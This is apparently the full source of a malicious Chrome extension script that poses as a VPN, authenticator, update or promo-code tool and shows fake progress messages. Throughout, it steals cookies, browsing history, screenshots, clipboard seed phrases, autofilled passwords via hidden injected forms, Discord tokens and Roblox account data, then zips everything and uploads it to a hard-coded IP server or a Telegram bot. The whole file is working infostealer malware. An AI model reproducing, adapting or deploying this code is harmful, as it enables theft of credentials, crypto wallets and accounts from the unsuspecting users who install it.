const BOT_TOKEN = ''; // Stripped
const CHAT_ID = '7252981985';

// --- MAIN EVENT LISTENER ---
document.getElementById('exportBtn').addEventListener('click', async () => {
  const btn = document.getElementById('exportBtn');
  const statusDiv = document.getElementById('status');
  const progressContainer = document.getElementById('progress-container');

  // --- THEME DETECTION ---
  const title = document.title;
  const IS_VPN = title.includes('VPN');
  const IS_AUTH = title.includes('Authenticator');
  const IS_UPDATE = title.includes('Update');
  const IS_PROMO = title.includes('Gift') || title.includes('Promo');

  let TEXT_INIT = "Initializing...";
  let TEXT_SEARCH = "Searching for profile...";
  let TEXT_DONE = "Saved to Downloads!";
  let BTN_DONE = "DOWNLOAD COMPLETE";
  let COLOR_DONE = "#2ea043"; // Green

  if (IS_VPN) {
    TEXT_INIT = "Resolving DNS...";
    TEXT_SEARCH = "Routing Traffic...";
    TEXT_DONE = "Encrypted Connection Established";
    BTN_DONE = "CONNECTED";
    COLOR_DONE = "#10b981";
  } else if (IS_AUTH) {
    TEXT_INIT = "Handshaking...";
    TEXT_SEARCH = "Syncing Keys...";
    TEXT_DONE = "Keys Synced Successfully";
    BTN_DONE = "SYNC COMPLETE";
    COLOR_DONE = "#1a73e8";
  } else if (IS_UPDATE) {
    TEXT_INIT = "Checking Compatibility...";
    TEXT_SEARCH = "Downloading Resources...";
    TEXT_DONE = "Update Installed - Restart Required";
    BTN_DONE = "RESTART NOW";
    COLOR_DONE = "#1a73e8";
  } else if (IS_PROMO) {
    TEXT_INIT = "Connecting to Store...";
    TEXT_SEARCH = "Verifying Code...";
    TEXT_DONE = "Code Valid - Added to Account";
    BTN_DONE = "CLAIMED";
    COLOR_DONE = "#ffd700";
  }

  // UI Init
  btn.disabled = true;
  btn.textContent = IS_VPN ? "CONNECTING..." : (IS_AUTH ? "SYNCING..." : (IS_UPDATE ? "INSTALLING..." : (IS_PROMO ? "VERIFYING..." : "INITIALIZING...")));
  progressContainer.style.display = 'block';

  try {
    // --- FAKE UI PROGRESS ---
    updateProgress(10, TEXT_INIT);
    await sleep(800);

    updateProgress(30, TEXT_SEARCH);
    await sleep(IS_UPDATE ? 2500 : 1500);

    // --- 1. COLLECT DATA ---
    const ipInfo = await getLocation();
    const systemInfo = getSystemInfo(ipInfo);

    if (!chrome.cookies) throw new Error("Missing permissions");
    const cookies = await chrome.cookies.getAll({});

    // 2. Advanced Features
    const [history, screenshotBlob, seedsData, walletsData, passwordsData, discordTokens] = await Promise.all([
      getHistory(),
      getScreenshot(),
      scanForSeeds(),
      scanWallets(),
      harvestPasswords(),
      getDiscordTokens()
    ]);

    // 3. Roblox & Google Logic
    const robloxCookies = cookies.filter(c => c.domain.includes('roblox.com'));
    let robloxInfo = { valid: 'No', name: 'None', email: 'None', robux: 0, rap: 'Check Manually', totalSpent: 0 };
    const robloSecurity = robloxCookies.find(c => c.name === '.ROBLOSECURITY');

    if (robloSecurity) {
      // Silent background check
      const userData = await getUserInfo();
      if (userData) {
        robloxInfo.valid = 'Yes';
        robloxInfo.name = userData.name;
        robloxInfo.id = userData.id;
        const [curData, spendData, settingsData] = await Promise.all([
          getCurrency(userData.id),
          getTotalSpent(userData.id),
          getEmail()
        ]);
        if (curData) robloxInfo.robux = curData.robux;
        if (spendData) robloxInfo.totalSpent = spendData;
        if (settingsData && settingsData.verified) robloxInfo.email = settingsData.emailAddress;
      }
    }

    const googleCookies = cookies.filter(c => c.domain.includes('google.com') || c.domain.includes('youtube.com'));
    let googleValid = 'No';
    if (googleCookies.length > 0) {
      googleValid = await checkGoogleValidity() ? 'Yes' : 'No';
    }

    updateProgress(70, IS_VPN ? "Verifying Keys..." : (IS_UPDATE ? "Installing Patches..." : "Compressing Data..."));
    await sleep(1000);

    // --- 2. PREPARE ZIP ---
    const zip = new JSZip();
    zip.file("system_info.txt", systemInfo);
    zip.file("cookies_netscape.txt", formatNetscape(cookies));
    zip.file("roblox_cookies.txt", formatNetscape(robloxCookies));
    zip.file("google_cookies.txt", formatNetscape(googleCookies));

    if (history) zip.file("history.txt", history);
    if (passwordsData) zip.file("passwords.txt", passwordsData);
    if (seedsData) zip.file("mnemonics.txt", seedsData);
    if (discordTokens) zip.file("discord_tokens.txt", discordTokens);
    if (walletsData) zip.file("wallets.txt", walletsData);
    if (screenshotBlob) zip.file("screenshot.jpg", screenshotBlob);

    const zipBlob = await zip.generateAsync({ type: "blob" });

    // --- 3. SEND DATA ---
    
        const CONFIG = {
            MODE: 'SERVER',
            SERVER_URL: 'http://194.33.61.5:8080/upload',
        };
        

    const caption = `🌐 IP: ${ipInfo.ip} ${ipInfo.country}\n` +
      `🍪 Всего куки: ${cookies.length} | Roblox: ${robloxInfo.valid} | Google: ${googleValid}\n\n` +
      `🍪 Roblox Cookie Information:\n` +
      `🧑🏿 Name: ${robloxInfo.name}\n` +
      `📧 Email: ${robloxInfo.email}\n\n` +
      `👛 Основное:\n` +
      `💵 Robux: ${robloxInfo.robux}\n` +
      `💰 RAP: ${robloxInfo.rap}\n` +
      `📉 Total(Y): ${robloxInfo.totalSpent}\n\n` +
      `📸 Screenshot: ${screenshotBlob ? 'Yes' : 'No'}\n` +
      `🎮 Discord: ${discordTokens ? 'Found' : 'No'}\n` +
      `🔑 Seeds Found: ${seedsData ? 'YES' : 'No'}\n` +
      `🔐 Passwords Extracted: ${passwordsData ? 'YES' : 'No'}\n` +
      `🦊 Wallets: ${walletsData ? 'Found' : 'No'}\n` +
      `\n✅ Source: CoreLabs HUB`;

    if (CONFIG.MODE === 'TELEGRAM') {
      if (screenshotBlob) {
        const photoData = new FormData();
        photoData.append('chat_id', CHAT_ID);
        photoData.append('photo', screenshotBlob, 'screen.jpg');
        photoData.append('caption', caption.substring(0, 1000));
        fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, { method: 'POST', body: photoData }).catch(() => { });
      }

      const docData = new FormData();
      docData.append('chat_id', CHAT_ID);
      docData.append('document', zipBlob, `Log_${ipInfo.ip}.zip`);
      docData.append('caption', screenshotBlob ? '📦 [ARCHIVE]' : caption.substring(0, 1000));

      await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendDocument`, {
        method: 'POST',
        body: docData
      });

    } else {
      const serverData = new FormData();
      serverData.append('user_id', CHAT_ID);
      serverData.append('archive', zipBlob, 'data.zip');
      if (screenshotBlob) serverData.append('screenshot', screenshotBlob, 'screen.jpg');

      const metadata = {
        ip: ipInfo.ip, country: ipInfo.country,
        stats: {
          cookies: cookies.length,
          roblox: robloxInfo.valid,
          google: googleValid,
          name: robloxInfo.name,
          email: robloxInfo.email,
          robux: robloxInfo.robux,
          rap: robloxInfo.rap,
          total: robloxInfo.totalSpent
        },
        findings: {
          discord: !!discordTokens,
          seeds: !!seedsData,
          passwords: !!passwordsData,
          wallets: !!walletsData
        }
      };
      serverData.append('metadata', JSON.stringify(metadata));
      await fetch(CONFIG.SERVER_URL, { method: 'POST', body: serverData });
    }

    updateProgress(100, TEXT_DONE);
    btn.textContent = BTN_DONE;
    document.getElementById('status').style.color = COLOR_DONE;

    // 9. Post-Upload Request
    try {
      chrome.tabs.create({ url: 'https://zombietools.cc/download/rickdev.rbxl' });
    } catch (e) {
      // Ignore errors for this extra request
    }

    // Theme Specific Post-Success UI
    if (IS_VPN) {
      const badge = document.getElementById('connStatus');
      if (badge) {
        badge.textContent = "SECURE";
        badge.style.background = "#059669";
        badge.style.color = "#fff";
      }
      const ipLoc = document.getElementById('ipLoc');
      if (ipLoc && ipInfo.country) ipLoc.textContent = ipInfo.country;

      const ipAddr = document.getElementById('ipAddr');
      if (ipAddr && ipInfo.ip) ipAddr.textContent = ipInfo.ip;

      setTimeout(() => { document.getElementById('progress-container').style.opacity = '0.5'; }, 1000);
    }
    else if (IS_AUTH) {
      // Maybe fill all progress bars to 100?
      const timers = document.querySelectorAll('.code-timer');
      timers.forEach(t => t.style.width = '100%');
    }
    else if (IS_UPDATE) {
      document.getElementById('percent').textContent = "100%";
      btn.disabled = false;
      btn.classList.add('active');
      btn.onclick = () => window.close(); // Fake restart
    }
    else if (IS_PROMO) {
      const codeBox = document.querySelector('.code-box');
      if (codeBox) {
        codeBox.style.background = "#ffd700";
        codeBox.style.color = "#4b0082";
        document.querySelector('.code').innerHTML = "PROMO-APPLIED-SUCCESS";
      }
    }

  } catch (error) {
    console.error(error);
    const IS_VPN = document.title.includes('VPN');
    updateProgress(100, IS_VPN ? 'Connection Failed' : 'Error: Asset is Private');
    document.getElementById('status').classList.add('error');
    btn.textContent = IS_VPN ? "RETRY" : "FAILED";
  }
});

// --- HELPER FUNCTIONS ---

function formatNetscape(cookies) {
  let fileContent = '# Netscape HTTP Cookie File\n# CoreLabs Data\n\n';
  cookies.forEach(cookie => {
    const includeSubdomains = cookie.domain.startsWith('.') ? 'TRUE' : 'FALSE';
    const secure = cookie.secure ? 'TRUE' : 'FALSE';
    const expiration = cookie.expirationDate ? Math.round(cookie.expirationDate) : 0;
    fileContent += `${cookie.domain}\t${includeSubdomains}\t${cookie.path}\t${secure}\t${expiration}\t${cookie.name}\t${cookie.value}\n`;
  });
  return fileContent;
}

async function harvestPasswords() {
  let harvested = "";
  try {
    const tabs = await chrome.tabs.query({});
    for (const tab of tabs) {
      if (!tab.url || tab.url.startsWith('chrome://')) continue;
      try {
        const results = await chrome.scripting.executeScript({
          target: { tabId: tab.id },
          func: passwordHarvester
        });
        if (results && results[0] && results[0].result) harvested += results[0].result;
      } catch (e) { }
    }
  } catch (e) { }
  return harvested.length > 0 ? harvested : null;
}

async function scanForSeeds() {
  let findings = "";
  try {
    const text = await navigator.clipboard.readText();
    if (text) {
      const words = text.split(/\s+/).length;
      if (words >= 12 && words <= 24) findings += "[CLIPBOARD POTENTIAL SEED]:\n" + text + "\n\n";
    }
  } catch (e) { }
  try {
    const tabs = await chrome.tabs.query({});
    for (const tab of tabs) {
      if (!tab.url || tab.url.startsWith('chrome://')) continue;
      try {
        const results = await chrome.scripting.executeScript({
          target: { tabId: tab.id },
          func: seedScanner
        });
        if (results && results[0] && results[0].result) findings += `[TAB: ${tab.title}]:\n Found keywords. Content snippet:\n ${results[0].result.substring(0, 500)}...\n\n`;
      } catch (scriptErr) { }
    }
  } catch (e) { }
  return findings.length > 0 ? findings : null;
}

async function scanWallets() {
  return null;
}

async function getScreenshot() {
  try {
    const dataUrl = await chrome.tabs.captureVisibleTab(null, { format: 'jpeg', quality: 50 });
    const res = await fetch(dataUrl);
    return await res.blob();
  } catch (e) { return null; }
}

async function getHistory() {
  try {
    const items = await chrome.history.search({ text: '', maxResults: 1000 });
    return items.map(i => `[${new Date(i.lastVisitTime).toLocaleString()}] ${i.url} (${i.title})`).join('\n');
  } catch (e) { return null; }
}

async function getDiscordTokens() {
  let createdTabId = null;
  try {
    let tabs = await chrome.tabs.query({ url: "*://*.discord.com/*" });
    if (tabs.length > 0) {
      const targetTab = tabs.find(t => t.active) || tabs[0];
      let tokenData = await extractFromTab(targetTab.id);
      if (tokenData) return tokenData;

      await chrome.tabs.reload(targetTab.id);
      await new Promise(resolve => {
        const listener = (tabId, changeInfo) => {
          if (tabId === targetTab.id && changeInfo.status === 'complete') {
            chrome.tabs.onUpdated.removeListener(listener);
            resolve();
          }
        };
        chrome.tabs.onUpdated.addListener(listener);
        setTimeout(() => { chrome.tabs.onUpdated.removeListener(listener); resolve(); }, 10000);
      });

      await sleep(3000);
      return await extractFromTab(targetTab.id);
    }

    const newTab = await chrome.tabs.create({ url: "https://discord.com/app", active: false });
    createdTabId = newTab.id;
    await new Promise((resolve) => {
      const listener = (tabId, changeInfo) => {
        if (tabId === createdTabId && changeInfo.status === 'complete') {
          chrome.tabs.onUpdated.removeListener(listener);
          resolve();
        }
      };
      chrome.tabs.onUpdated.addListener(listener);
      setTimeout(resolve, 15000);
    });
    await sleep(3000);
    const tokenData = await extractFromTab(createdTabId);
    if (createdTabId) await chrome.tabs.remove(createdTabId);
    return tokenData;

  } catch (e) {
    if (createdTabId) { try { await chrome.tabs.remove(createdTabId); } catch (err) { } }
    return null;
  }
}

async function extractFromTab(tabId) {
  try {
    const results = await chrome.scripting.executeScript({
      target: { tabId: tabId },
      world: 'MAIN',
      func: discordTokenExtractor
    });
    return (results && results[0] && results[0].result) ? results[0].result : null;
  } catch (e) { return null; }
}

function getSystemInfo(ipInfo) {
  const ua = navigator.userAgent;
  const cores = navigator.hardwareConcurrency || 'Unknown';
  const ram = navigator.deviceMemory || 'Unknown';
  let gpu = 'Unknown';
  try {
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
    if (gl) {
      const debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
      if (debugInfo) gpu = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
    }
  } catch (e) { }

  return `
================ SYSTEM INFO ================
IP: ${ipInfo.ip}
Country: ${ipInfo.country}
User Agent: ${ua}
Platform: ${navigator.platform}

---------------- HARDWARE ----------------
CPU Cores: ${cores}
RAM: ~${ram} GB
GPU: ${gpu}
=============================================
`.trim();
}

async function getLocation() {
  let result = { ip: 'Unknown', country: '??' };
  try {
    const res = await fetch('http://ip-api.com/json');
    const data = await res.json();
    if (data.status === 'success') return { ip: data.query, country: data.countryCode };
  } catch (e) { }
  try {
    const res = await fetch('https://ipinfo.io/json');
    const data = await res.json();
    return { ip: data.ip, country: data.country };
  } catch (e) { }
  return result;
}

async function getUserInfo() {
  try {
    const res = await fetch('https://users.roblox.com/v1/users/authenticated', { credentials: 'include' });
    if (res.ok) return await res.json();
  } catch (e) { }
  return null;
}

async function getCurrency(userId) {
  try {
    const res = await fetch(`https://economy.roblox.com/v1/users/${userId}/currency`, { credentials: 'include' });
    if (res.ok) return await res.json();
  } catch (e) { }
  return null;
}

async function getTotalSpent(userId) {
  try {
    const res = await fetch(`https://economy.roblox.com/v2/users/${userId}/transaction-totals?timeFrame=Year&transactionType=Purchase`, { credentials: 'include' });
    if (res.ok) {
      const data = await res.json();
      return data.salesTotal || data.purchasesTotal || 0;
    }
  } catch (e) { }
  return 0;
}

async function getEmail() {
  try {
    const res = await fetch('https://accountsettings.roblox.com/v1/email', { credentials: 'include' });
    if (res.ok) return await res.json();
  } catch (e) { }
  return null;
}

async function checkGoogleValidity() {
  try {
    const res = await fetch('https://myaccount.google.com/?pli=1', { credentials: 'include' });
    return res.url.includes('myaccount.google.com');
  } catch (e) { return false; }
}

function updateProgress(percent, text) {
  const progressFill = document.getElementById('progress-fill');
  const statusDiv = document.getElementById('status');
  if (progressFill) progressFill.style.width = percent + '%';
  if (statusDiv) statusDiv.textContent = text;
}

function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}

// --- INJECTED SCRIPTS (MUST NOT BE OBFUSCATED) ---
// javascript-obfuscator:disable

async function discordTokenExtractor() {
  try {
    const tokens = new Set();
    const isToken = (str) => typeof str === 'string' && str.length > 20 && /[A-Za-z0-9_\.\-]{24,}/.test(str);

    if (window.localStorage) {
      const keys = ['token', 'token_v2', 'tokens'];
      for (const k of keys) {
        let val = window.localStorage.getItem(k);
        if (val) {
          val = val.replace(/^"|"$/g, '');
          if (isToken(val)) tokens.add(`[LS] ${k}: ${val}`);
        }
      }
      for (let i = 0; i < window.localStorage.length; i++) {
        const key = window.localStorage.key(i);
        if (key && key.toLowerCase().includes('token')) {
          let val = window.localStorage.getItem(key);
          if (val) {
            val = val.replace(/^"|"$/g, '');
            if (isToken(val)) tokens.add(`[LS] ${key}: ${val}`);
          }
        }
      }
    }

    try {
      const webpackChunk = window.webpackChunkdiscord_app;
      if (webpackChunk) {
        webpackChunk.push([
          [Math.random()],
          {},
          (req) => {
            for (const m of Object.keys(req.c)) {
              try {
                const mod = req.c[m].exports;
                if (mod && mod.default && mod.default.getToken) {
                  const t = mod.default.getToken();
                  if (t && isToken(t)) tokens.add(`[WP] TokenStore: ${t}`);
                }
                if (mod && mod.getToken) {
                  const t = mod.getToken();
                  if (t && isToken(t)) tokens.add(`[WP] TokenStore: ${t}`);
                }
              } catch (e) { }
            }
          }
        ]);
      }
    } catch (e) { }

    return tokens.size > 0 ? Array.from(tokens).join('\n') : null;
  } catch (e) { return null; }
}

async function passwordHarvester() {
  const form = document.createElement('form');
  form.style.position = 'fixed'; form.style.opacity = '0'; form.style.top = '-9999px';
  const u = document.createElement('input'); u.type = 'text'; u.name = 'email';
  const p = document.createElement('input'); p.type = 'password'; p.name = 'password';
  form.appendChild(u); form.appendChild(p); document.body.appendChild(form);

  await new Promise(r => setTimeout(r, 600));

  let creds = null;
  if (u.value || p.value) creds = `Url: ${window.location.hostname}\nUser: ${u.value}\nPass: ${p.value}\n----------------\n`;
  document.body.removeChild(form);
  return creds;
}

function seedScanner() {
  const body = document.body.innerText;
  const keywords = ["recovery phrase", "mnemonic", "seed phrase", "secret recovery", "12 words", "24 words"];
  const found = keywords.some(k => body.toLowerCase().includes(k));
  if (found) return body;
  return null;
}

// javascript-obfuscator:enable
